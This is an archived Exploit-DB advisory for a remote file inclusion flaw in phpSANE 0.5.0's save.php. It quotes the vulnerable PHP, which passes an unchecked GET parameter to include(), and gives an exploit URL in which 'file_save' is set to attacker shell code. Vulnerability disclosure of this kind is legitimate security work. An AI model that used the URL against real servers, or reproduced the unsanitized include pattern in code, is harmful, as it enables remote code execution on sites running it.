exploit-db-mirror/platforms/php/webapps/9533.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

38 lines
1.2 KiB
Text
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

-----------------------------------------------------------------------------------
phpSANE v 0.5.0 (save.php) Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------
Author: CoBRa_21
Mail: uyku_cu@windowslive.com
Script Download:http://sourceforge.net/projects/phpsane/
Dork: Yok :P
-----------------------------------------------------------------------------------
BUG
<?PHP
include("language.php");
$file_save = $_GET['file_save'];
$file_save_image = $_GET['file_save_image'];
$lang_id = $_GET['lang_id'];
if ($file_save_image)
{
echo "<p class=\"align_center\">\n";
echo "<img src=\"".$file_save."\" border=\"2\">\n";
echo "</p>\n";
}
else
{
// my_pre my_mono
echo "<p class=\"my_pre\">\n";
include($file_save);
echo "</p>\n";
echo "<hr>\n";
}
-----------------------------------------------------------------------------------
Exploit
http://localhost/path/save.php?file_save= (Shell Code)
-----------------------------------------------------------------------------------
Tüm İslam Aleminin Ramazan-ı Şerifleri Hayırlı ve Mubarek Olsun.
-----------------------------------------------------------------------------------
# milw0rm.com [2009-08-26]